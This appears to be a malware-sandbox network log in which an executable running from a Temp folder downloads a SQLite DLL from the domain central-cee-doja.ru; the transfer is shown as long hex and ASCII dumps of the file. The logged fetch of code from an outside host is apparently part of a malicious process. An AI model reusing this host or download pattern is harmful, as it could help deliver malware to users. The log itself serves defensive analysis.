Name="arg" Type="Double" Mode="In" /> </Function> ... DEGREES( arg ) arg: tinyint, smallint, int, bigint, numeric, decimal, smallmoney, money, real, float returns: tin
2023-11-18 09:02:37 UTC	751	IN	Data Raw: 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 65 72 69 63 5f 65 78 70 72 65 73 73 69 6f 6e 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 4f 55 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 Data Ascii: ND" BuiltIn="true"> <ReturnType Type="Int64" /> <Parameter Name="numeric_expression" Type="Int64" Mode="In" /> <Parameter Name="length" Type="Int32" Mode="In" /> </Function> <Function Name="ROUND" BuiltIn="true"> <ReturnTyp
2023-11-18 09:02:37 UTC	755	IN	Data Raw: 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 Data Ascii: sion" ColumnName="DateTimePrecision" /> <cs:ScalarProperty Name="Precision" ColumnName="Precision" /> <cs:ScalarProperty Name="Scale" ColumnName="Scale" /> <cs:ComplexProperty Name="Collation"> <cs:ScalarProperty Name="Ca
2023-11-18 09:02:37 UTC	759	IN	Data Raw: 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 43 61 74 61 6c 6f 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 53 63 68 65 6d 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 43 6f 6c 6c 61 74 69 6f 6e 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 Data Ascii: Property Name="CatalogName" ColumnName="ReturnCollationCatalog" /> <cs:ScalarProperty Name="SchemaName" ColumnName="ReturnCollationSchema" /> <cs:ScalarProperty Name="Name" ColumnName="ReturnCollationName" /> </cs:ComplexProper
2023-11-18 09:02:37 UTC	762	IN	Data Raw: 75 6d 6e 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 61 6d 65 74 65 72 54 79 70 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 Data Ascii: umnName="Ordinal" /> <cs:ComplexProperty Name="ParameterType"> <cs:ScalarProperty Name="TypeName" ColumnName="TypeName" /> <cs:ScalarProperty Name="MaxLength" ColumnName="MaxLength" /> <cs:ScalarProperty Name="DateTimePrecisi
2023-11-18 09:02:37 UTC	763	IN	Data Raw: 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 6f 64 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4d 6f 64 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 65 66 61 75 6c 74 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 44 65 66 61 75 6c 74 22 20 2f 3e 0a 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e 67 3e 0a 0a 20 20 20 20 3c 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e 67 20 4e Data Ascii: perty Name="IsMultiSet" ColumnName="IsMultiSet" /> </cs:ComplexProperty> <cs:ScalarProperty Name="Mode" ColumnName="Mode" /> <cs:ScalarProperty Name="Default" ColumnName="Default" /> </cs:EntitySetMapping> <cs:EntitySetMapping N
2023-11-18 09:02:37 UTC	767	IN	Data Raw: 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 54 79 70 65 22 20 56 61 6c 75 65 3d 22 50 52 49 4d 41 52 59 20 4b 45 59 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 Data Ascii: olumnName="ConstraintType" Value="PRIMARY KEY"/> </cs:MappingFragment> </cs:EntityTypeMapping> <cs:EntityTypeMapping TypeName="Store.ForeignKeyConstraint" > <cs:MappingFragment StoreEntitySet="SViewConstraints"> <cs:S
2023-11-18 09:02:37 UTC	771	IN	Data Raw: 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 20 4e 61 6d 65 3d 22 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 50 61 72 65 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 Data Ascii: ciationSetMapping Name="ViewViewConstraints" StoreEntitySet="SViewConstraints" TypeName="Store.TableOrViewConstraint"> <cs:EndProperty Name="Parent"> <cs:ScalarProperty Name="Id" ColumnName="ParentId" /> </cs:EndProperty> <cs:End
2023-11-18 09:02:37 UTC	775	IN	Data Raw: 00 2e 00 64 00 61 00 74 00 61 00 2e 00 73 00 71 00 6c 00 69 00 74 00 65 00 2e 00 6f 00 72 00 67 00 2f 00 00 00 60 00 1c 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 44 00 61 00 74 00 61 00 2e 00 53 00 51 00 4c 00 69 00 74 00 65 00 20 00 66 00 6f 00 72 00 20 00 4c 00 49 00 4e 00 51 00 00 00 34 00 0a 00 01 00 46 00 69 00 6c 00 65 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 31 00 2e 00 30 00 2e 00 31 00 31 00 35 00 2e 00 35 00 00 00 58 00 1c 00 01 00 49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 44 00 61 00 74 00 61 00 2e 00 53 00 51 00 4c 00 69 00 74 00 65 00 2e 00 Data Ascii: .data.sqlite.org/`FileDescriptionSystem.Data.SQLite for LINQ4FileVersion1.0.115.5XInternalNameSystem.Data.SQLite.
2023-11-18 09:02:37 UTC	779	IN	Data Raw: 10 06 03 55 04 05 13 09 33 36 34 36 31 37 2d 39 36 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 0f 30 0d 06 03 55 04 08 13 06 4f 72 65 67 6f 6e 31 12 30 10 06 03 55 04 07 13 09 42 65 61 76 65 72 74 6f 6e 31 2f 30 2d 06 03 55 04 0a 13 26 4d 69 73 74 61 63 68 6b 69 6e 20 53 79 73 74 65 6d 73 20 28 4a 6f 73 65 70 68 20 4d 69 73 74 61 63 68 6b 69 6e 29 31 2f 30 2d 06 03 55 04 03 13 26 4d 69 73 74 61 63 68 6b 69 6e 20 53 79 73 74 65 6d 73 20 28 4a 6f 73 65 70 68 20 4d 69 73 74 61 63 68 6b 69 6e 29 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 d5 70 b7 e5 f9 cf 1c 60 22 ec a9 c9 af 23 4d 14 c5 e4 58 c8 66 19 81 2a 3a a4 18 e9 70 32 d8 b2 03 63 30 f8 8b 47 ea d2 fe b6 0d c3 78 38 2b a6 17 b8 51 24 26 b0 8b 91 64 Data Ascii: U364617-9610UUS10UOregon10UBeaverton1/0-U&Mistachkin Systems (Joseph Mistachkin)1/0-U&Mistachkin Systems (Joseph Mistachkin)0"0H0p`"#MXf:p2c0Gx8+Q$&d
2023-11-18 09:02:37 UTC	783	IN	Data Raw: 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 24 30 22 06 03 55 04 03 13 1b 44 69 67 69 43 65 72 74 20 41 73 73 75 72 65 64 20 49 44 20 52 6f 6f 74 20 43 41 30 1e 17 0d 31 36 30 31 30 37 31 32 30 30 30 30 5a 17 0d 33 31 30 31 30 37 31 32 30 30 30 30 5a 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bd d0 32 ee 4b cd 8f 7f dd Data Ascii: 10Uwww.digicert.com1$0"UDigiCert Assured ID Root CA0160107120000Z310107120000Z0r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA0"0*H02K
2023-11-18 09:02:37 UTC	787	IN	Data Raw: 61 63 68 6b 69 6e 29 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 d5 70 b7 e5 f9 cf 1c 60 22 ec a9 c9 af 23 4d 14 c5 e4 58 c8 66 19 81 2a 3a a4 18 e9 70 32 d8 b2 03 63 30 f8 8b 47 ea d2 fe b6 0d c3 78 38 2b a6 17 b8 51 24 26 b0 8b 91 64 ac bf 1d 8c 37 fd 4a ae a3 3f d6 de c7 0b 4f d3 76 df 3e 7c 07 06 48 8c 07 ad e9 40 eb c1 70 4f 83 80 5d 44 a0 95 e6 9c 40 0f 53 e9 d0 17 7d b2 8f bf c7 22 a1 c8 e2 9a 54 b9 67 f3 04 f8 ca d7 f6 de ea e2 56 a4 b0 33 59 a6 0d 48 2a c3 36 06 d7 85 05 1e e9 37 58 f7 36 67 ce 6e de ba 71 3e 43 99 3e 1b 9f d2 d5 71 e5 dc ca 09 5b 24 05 2a 4d 67 52 6b ec 71 0e 59 e4 e8 ba c5 a1 e1 95 8d 31 97 a4 41 6c 4a 80 8d 66 c2 92 e5 53 ed e4 95 0b 93 cf b8 d8 9c ee 91 ff 51 e7 0f 2b 3e Data Ascii: achkin)0"0H0p`"#MXf:p2c0Gx8+Q$&d7J?Ov>\|H@pO]D@S}"TgV3YH67X6gnq>C>q[$MgRkqY1AlJfSQ+>
2023-11-18 09:02:37 UTC	791	IN	Data Raw: 44 69 67 69 43 65 72 74 20 41 73 73 75 72 65 64 20 49 44 20 52 6f 6f 74 20 43 41 30 1e 17 0d 31 36 30 31 30 37 31 32 30 30 30 30 5a 17 0d 33 31 30 31 30 37 31 32 30 30 30 30 5a 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bd d0 32 ee 4b cd 8f 7f dd a9 ba 82 99 c5 39 54 28 57 b6 23 4a c4 0e 07 45 33 51 10 7d d0 f9 7d 4d 68 7e e7 b6 a0 f4 8d b3 88 e4 97 bf 63 21 Data Ascii: DigiCert Assured ID Root CA0160107120000Z310107120000Z0r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA0"0*H02K9T(W#JE3Q}}Mh~c!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	104.21.89.193	443	192.168.2.4	49747	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:36 UTC	596	OUT	GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:37 UTC	596	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:37 GMT Content-Type: application/x-msdos-program Content-Length: 201520 Connection: close Last-Modified: Tue, 02 Nov 2021 17:45:14 GMT ETag: "31330-5cfd1db111e80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7RkxbinR9HD0sZXkUvyXWRnVDIzuXB0lT64wEI3PoUrlRhoqvIuoGrexip5yKwTcttYDc5u59S6V6hThSWtTBS52zrF1Bpir6dP4VlHye0jUEHL%2B1lwerPM84uczxC8R6lVOdmzY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0918ceda682a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:37 UTC	596	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 d6 e6 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c7 99 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 @`
2023-11-18 09:02:37 UTC	597	IN	Data Raw: 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 63 00 00 70 73 6f 01 00 06 0a Data Ascii: o)t,+r9po"&%oo%r?po"&o+o%o-,o,oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %rcpso
2023-11-18 09:02:37 UTC	598	IN	Data Raw: 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a 7d 02 00 00 04 02 7b 02 00 00 Data Ascii: o,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&. (D0sEoo/"o0sEoo/j{-sF}{
2023-11-18 09:02:37 UTC	600	IN	Data Raw: 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 25 2c 00 0a 00 00 00 00 1b 30 Data Ascii: +!***********rp(psqz0/oros,ot,ou-otroet~ov(5ow0:ox+oyoz({,o-,o*%,0
2023-11-18 09:02:37 UTC	601	IN	Data Raw: 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 36 02 03 6f a1 00 00 0a Data Ascii: zo(y`6o(\|00oo(yo(\|o(w``0o(yo(y`0+o(zo(zo(y``0+o(yo(yo(y``6o
2023-11-18 09:02:37 UTC	602	IN	Data Raw: 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 b4 06 00 70 14 Data Ascii: pso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso%rp
2023-11-18 09:02:37 UTC	604	IN	Data Raw: 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 06 07 72 3f 00 00 70 6f 46 00 Data Ascii: s so,oo/0~Xs(,o(+0QsJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(r?poF
2023-11-18 09:02:37 UTC	605	IN	Data Raw: 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 02 7b 15 00 00 04 7b 3d 00 00 Data Ascii: z*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o{{=
